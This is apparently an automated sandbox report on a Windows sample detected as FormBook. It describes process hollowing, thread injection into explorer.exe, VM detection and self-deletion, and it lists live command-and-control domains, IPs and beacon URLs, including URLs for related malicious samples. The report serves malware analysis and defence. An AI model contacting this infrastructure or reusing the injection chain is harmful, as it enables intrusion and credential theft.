          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.gentrypartyof8.com
          Source: C:\Windows\explorer.exe | Domain query: www.rsyueda.com
          Source: C:\Windows\explorer.exe | Network Connect: 23.82.229.132 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.146 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1370000
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Process created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: explorer.exe, 00000005.00000000.657818054.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669694519.0000000005E50000.00000004.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.689362346.0000000001080000.00000002.00000001.sdmp, raserver.exe, 0000000C.00000002.912634794.0000000003390000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Users\user\Desktop\XhU4EXUp0x.exe VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 331 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 141 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 141 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 433531 | Sample: XhU4EXUp0x.exe | Start date: 12/06/2021 | Architecture: WINDOWS | Score: 100

          Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures

          Process chain recovered from the graph (rendered as an image in the original):

          • XhU4EXUp0x.exe (started) | dropped: C:\Users\user\AppData\...\XhU4EXUp0x.exe.log, ASCII | Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect virtualization through RDTSC time measurements
            • XhU4EXUp0x.exe (started) | Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              • explorer.exe (injected) | www.rsyueda.com 23.82.229.132, 49765, 80 LEASEWEB-USA-SEA-10US United States; gentrypartyof8.com 66.235.200.146, 49762, 80 CLOUDFLARENETUS United States; www.gentrypartyof8.com | System process connects to network (likely due to code injection or exploit)
                • raserver.exe (started) | Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  • cmd.exe (started)
                    • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          XhU4EXUp0x.exe | 21% | Virustotal |
          XhU4EXUp0x.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          XhU4EXUp0x.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.2.XhU4EXUp0x.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.0.XhU4EXUp0x.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.rsyueda.com | 23.82.229.132 | true | true | | unknown
          gentrypartyof8.com | 66.235.200.146 | true | true | | unknown
          www.gentrypartyof8.com | unknown | unknown | true | | unknown

                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.gentrypartyof8.com/nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH | true | Avira URL Cloud: safe | unknown
          http://www.rsyueda.com/nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH | true | Avira URL Cloud: safe | unknown
          www.yellow-wink.com/nff/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.%s.comPAexplorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    http://www.fonts.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
66.235.200.146 | gentrypartyof8.com | United States | 13335 | CLOUDFLARENETUS | true
23.82.229.132 | www.rsyueda.com | United States | 396190 | LEASEWEB-USA-SEA-10US | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433531
Start date: 12.06.2021
Start time: 08:56:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: XhU4EXUp0x.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 17.9% (good quality ratio 16.3%)
• Quality average: 73.8%
• Quality standard deviation: 30.8%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 204.79.197.222, 13.88.21.125, 52.147.198.201, 52.113.196.254, 104.43.139.144, 20.82.209.104, 20.54.104.15, 20.54.7.98, 205.185.216.10, 205.185.216.42, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
• Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, a-0019.a-msedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, teams-9999.teams-msedge.net, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:57:13 | API Interceptor | 1x Sleep call for process: XhU4EXUp0x.exe modified

Joe Sandbox View / Context

IPs

Match: 66.235.200.146

Associated Sample Name / URL | Detection | Context
New Purchase Order20210609.exe | malicious | www.anderson-anderson.com/un8c/?6lGd=HBZ81PLPUzqhOj&3f-H3H=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilL37bAvbTVrR
packa.....(1).exe | malicious | www.apexpioneer.com/wdva/?kfD4qZ=qWl9Mj/s+HilBOtVYaSZVR6j4m9BeajRzFuKOkq+ALHs1EAUycBQc15lgYPA8iZZOcHD&kr0=dbF0vFoPNvL
New order 201534.pdf.exe | malicious | www.thedailymino.com/sbqi/?8pdPxFYX=jXb6weh8fwwMUEgPJJl7RJ0MRYZqFSz6owdMJ8CEOPRP4uFAZVBZ7eXod2M1Xtzg6qh0&_FNlAt=tVEl9tDHXfB4
New Order_PO 1164_HD-F 4020 6K.exe | malicious | www.anderson-anderson.com/un8c/?D8ODAr=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&mJ=V6AHzvxh
New Order_PO 1164_HD-F 4020 6K.exe | malicious | www.anderson-anderson.com/un8c/?Lh0l=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&VTKh=vBZtYDQXqZ4DGn
y6f8O0kbEB.exe | malicious | www.taratakeson.com/oerg/?ndndnZ=UtWlYrO0rhjH&mHLD_0=dr4pMwcdhZcmPSbPHAIEo/sox+gcSbBb1FVNS74e5R2NObgAqDDHvg7Hj8ybvDNWoVhE
bibviv.exe | malicious | www.milkweedmagic.com/vns/
INVOICE PAYMENT.exe | malicious | www.milkweedmagic.com/vns/?nloHn6=zPqtcJu8h&OH5LRV=dxIiDTMmZIUelDEuKFBNrZVGQoGe1rqzTAT6E2MP4OmWiXtk9zOjG3OmaVxdpx2vqn8e
BL Draft copy.exe | malicious | www.smallpeo.com/sx8c/?inzXrV1h=CQJBYFRSx3Pkz4hmjXzNOjG1WISSVLs1fX4LX3HiJ6zoF9rBVgsTdld9Os8/rzow8SJA&SP=cnxT3HrH
2os1TIXTXk.exe | malicious | www.iidiotproof.com/mdi/?Yn=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOF+JlL3+nX&mvKtg=Y4C4_fDHvx98fJ5
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5622407407.dat
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5507399306.dat
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5414023148.dat
orii11.exe | malicious | www.iidiotproof.com/mdi/?ndn4iL=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqbu/uYFztZGQ&OR9=uTypBLyh3rCtd
orii11.exe | malicious | www.iidiotproof.com/mdi/?8pp=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOvh5VLz8vX&sZCx=1bYdfPf8ef5pjPm
PO.x00991882822.xlsm | malicious | www.rmpclean.com/private/?-ZL=kjFT_jlXCZeHrh&FVTt=Uhbi9DfUBq2i/1fkh0yGI21N5OQMN5zBtkTJbOEZT9D8cf6FKtFeyjvu/14BaEQ5k4UB
Parcel _009887 .exe | malicious | www.ocicoxford.com/csw6/?t8bHuZw=efwaGXT9IzbmNtOzDnCu+48vppNLQWQKGJFN33tYCz0tX5X/vDpmiH8bd6jrvtNwDjI3p9k8/g==&2d=llsp
P.O-DT1692.exe | malicious | www.drtarver.com/g65/?hL0=/G2o2cr0v4Q8hBBM9UJDjH+yY22wUVLVeIfqLGL5GIR6ySKGryVcUhqqpJFQ9LO6Iwep&Wr=LhnLHrv8d
SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exe | malicious | www.elrodeorestaurantbw.com/cdl/?Mfg=/L1lIqGS5r2x+RFPi+XkQGVOlUslsJfdMM9Npew4xv9wNb7VMt18zc8R4PiLn7n17TkB&uVxpj=ojO0dJYX1B
AWB_SHIPPING_DOCUMENT_pdf.exe | malicious | www.lincolnreadymeals.com/me2z/?absDxBr=WOPwKhxv/yLwNDnXBLmuN1eR3SzsT6kHFNnvJn0nwfrdF7aBYBJOwB9MozwDSP7grAKd&pPX=EFQpsLbPFZvt

Domains

No context

ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
1VTzed95Tz.exe | malicious | 104.21.45.72
DHL AWB TRACKING DETAILS.exe | malicious | 104.21.19.200
Proforma Invoice.exe | malicious | 104.21.19.200
TLUN2Qvsx2.exe | malicious | 104.23.98.190
rL2F1mjb2l.exe | malicious | 104.23.99.190
tvijATOn6L.exe | malicious | 104.23.99.190
8964532115.exe | malicious | 172.67.188.154
DHL_2761228.exe | malicious | 162.159.133.233
0900988099900000.exe | malicious | 172.67.188.154
Payment Advice.exe | malicious | 104.21.19.200
VM64DGCRMN5XGK.htm | malicious | 104.16.18.94
1EFNborqwh.dll | malicious | 104.20.185.68
OrderKLB210568.exe | malicious | 104.16.13.194
Purchase_Order.exe | malicious | 104.21.64.212
main_setup_x86x64.exe | malicious | 172.67.188.69
b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exe | malicious | 104.26.9.187
LsWgkxVLk1.dll | malicious | 104.20.184.68
HHHyXsu7Vj.dll | malicious | 104.20.184.68
7Nboq835Fc.exe | malicious | 104.21.19.200
moq fob order.exe | malicious | 172.67.188.154

Match: LEASEWEB-USA-SEA-10US

Associated Sample Name / URL | Detection | Context
Product_Samples.exe | malicious | 23.82.229.141
RFQ_BRAT_METAL_TECH_LTD.exe | malicious | 23.82.229.141
Airwaybill # 6913321715.exe | malicious | 23.82.149.3
8UsA.sh | malicious | 172.241.159.235
493bfe21_by_Libranalysis.exe | malicious | 23.82.149.3
PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe | malicious | 23.82.229.141
Rio International LLC URGENT REQUEST FOR QUOTATION.exe | malicious | 23.82.229.141
NEW ORDER ELO-05756485.exe | malicious | 23.82.149.10
OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe | malicious | 23.82.230.186
order samples 056-059_pdf.exe | malicious | 23.82.225.149
order samples 056-062 _pdf.exe | malicious | 23.82.225.149
OPSzlwylj5.exe | malicious | 173.234.15.207
BSG_ptf.exe | malicious | 23.82.225.149
FeDex Shipment Confirmation.exe | malicious | 23.82.229.136
FeDex Shipment Confirmation.exe | malicious | 23.82.229.136
yqfUONVqpk.exe | malicious | 173.234.15.207
sntU1XoQa3.exe | malicious | 173.234.15.207
vvUkaRlJUJ.exe | malicious | 173.234.15.207
ZRz0Aq1Rf0.dll | malicious | 23.82.78.4
hkcmd.exe | malicious | 173.234.15.207

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.log
Process: C:\Users\user\Desktop\XhU4EXUp0x.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1406
Entropy (8bit): 5.341099307467139
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
MD5: E5FA1A53BA6D70E18192AF6AF7CFDBFA
SHA1: 1C076481F11366751B8DA795C98A54DE8D1D82D5
SHA-256: 1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
